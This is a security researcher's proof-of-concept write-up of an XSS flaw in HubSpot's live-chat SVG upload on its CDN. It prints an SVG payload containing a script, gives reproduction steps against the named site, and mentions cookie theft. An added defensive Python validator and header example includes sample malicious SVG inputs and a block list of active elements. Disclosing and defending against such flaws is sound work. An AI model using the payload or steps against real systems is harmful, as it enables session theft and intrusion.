Description:
DOM-based XSS is a variant of both persistent and reflected XSS. In a DOM-based XSS attack, the malicious string is not actually parsed by the victim's browser until the website's legitimate JavaScript has run. In the earlier examples of persistent and reflected XSS attacks, the server inserts the malicious script into the page, which is then sent in a response to the victim. Once the victim's browser receives the response, it assumes the malicious script is part of the page's legitimate content and automatically executes it during page load like any other script.
In the example of a DOM-based XSS attack, however, I selected the domain https://www.hubspot.com/. First of all I visited https://www.hubspot.com/ to find some vulnerabilities. I tried to upload an SVG file containing XSS payloads; the uploader was in the chat box/live chat, which uses HubSpot's CDN (Content Delivery Network) service, and the domain is https://cdnp.hubspot.net/. The payloads executed on the HubSpot CDN through HubSpot, and this type of vulnerability can be defined as DOM-based XSS.

We can create an SVG file with the following code:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS by Rahad\n'+document.documentURI);
</script>
</svg>

Then save it as an SVG file, upload it to the application and click to visit the page. We can create an alert box with access to the DOM, enabling cookie theft or other forms of attack such as serving malicious software.

The steps to reproduce the vulnerability are as follows.

  • Visit this URL: https://www.hubspot.com/
  • Open the live chat
  • Upload / attach the SVG file in the live chat box and send it
  • Click the attached file
  • The file opens in a new tab with a popup, which clearly represents an XSS vulnerability in https://cdnp.hubspot.net/
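As an added, defender-side example that is not part of the original post, the following Python check shows two controls that break this kind of upload-based XSS: an upload validator that rejects SVG documents carrying executable content (script elements, on* event handler attributes, javascript:/data: hrefs, DTD entity declarations), and the response headers a file-hosting origin such as a CDN can send so that a user-supplied SVG is downloaded rather than rendered as a scriptable document. Function names, the element and scheme lists, and all sample inputs are my own constructions; the first sample merely mirrors the shape of the post's SVG with a harmless console.log in place of the alert.

```python
import xml.etree.ElementTree as ET

# Constructed sample inputs (not files from the post): one SVG shaped like the
# post's proof-of-concept, one benign drawing, and three other risky forms.
PAGE_STYLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">console.log(document.documentURI);</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="5" cy="5" r="4" fill="red"/></svg>'
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="console.log(1)"><rect width="1" height="1"/></svg>'
HREF_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:void(0)"><rect width="1" height="1"/></a></svg>')
ENTITY_SVG = b'<!DOCTYPE svg [<!ENTITY x "y">]><svg xmlns="http://www.w3.org/2000/svg">&x;</svg>'

# SVG elements that can carry or load executable content (assumed list).
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "object", "embed"}
# URL schemes in href that execute or embed content rather than link to it.
ACTIVE_SCHEMES = {"javascript", "vbscript", "data"}


def _local(qname: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified names."""
    return qname.rsplit("}", 1)[-1]


def svg_findings(svg_bytes: bytes) -> list[str]:
    """Return the reasons an uploaded SVG should be rejected (empty list = clean)."""
    # Refuse entity declarations before parsing: they enable XXE / entity-expansion
    # attacks against the checker itself and have no place in a drawing.
    if b"<!ENTITY" in svg_bytes:
        return ["DTD entity declaration"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():  # iter() yields the root itself and every descendant
        tag = _local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):  # onload=, onclick=, onmouseover=, ...
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href" and ":" in value:  # covers both href and xlink:href
                scheme = value.strip().lower().split(":", 1)[0]
                if scheme in ACTIVE_SCHEMES:
                    findings.append(f"{scheme}: URL in href on <{tag}>")
    return findings


def svg_is_safe(svg_bytes: bytes) -> bool:
    return not svg_findings(svg_bytes)


def attachment_headers(filename: str) -> dict[str, str]:
    """Headers for serving a user upload from a file-hosting origin.

    Content-Disposition: attachment makes the browser download the file instead
    of rendering it as a top-level document, and the CSP (default-src 'none' plus
    sandbox) neutralises inline script if the file is ever rendered anyway.
    """
    safe_name = filename.replace('"', "").replace("\r", "").replace("\n", "")
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for label, sample in [("page-style", PAGE_STYLE_SVG), ("benign", BENIGN_SVG),
                          ("handler", HANDLER_SVG), ("href", HREF_SVG), ("entity", ENTITY_SVG)]:
        print(label, "->", svg_findings(sample) or "clean")
    print(attachment_headers("upload.svg"))
```

The validator is an allow-by-structure check rather than a regex over the raw text, so obfuscation inside attribute values does not matter: anything that is a script element, an event handler attribute or an active-scheme href is rejected regardless of how it is spelled. The headers are the second, independent layer; even a CDN that never validates uploads stops this PoC if it serves attachments with Content-Disposition: attachment and a sandboxing CSP, because the script then runs in no origin at all.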

Video POC:

Thanks and Regards
Rahad Chowdhury

One thought on “DOM Based XSS in Hubspot PoC”
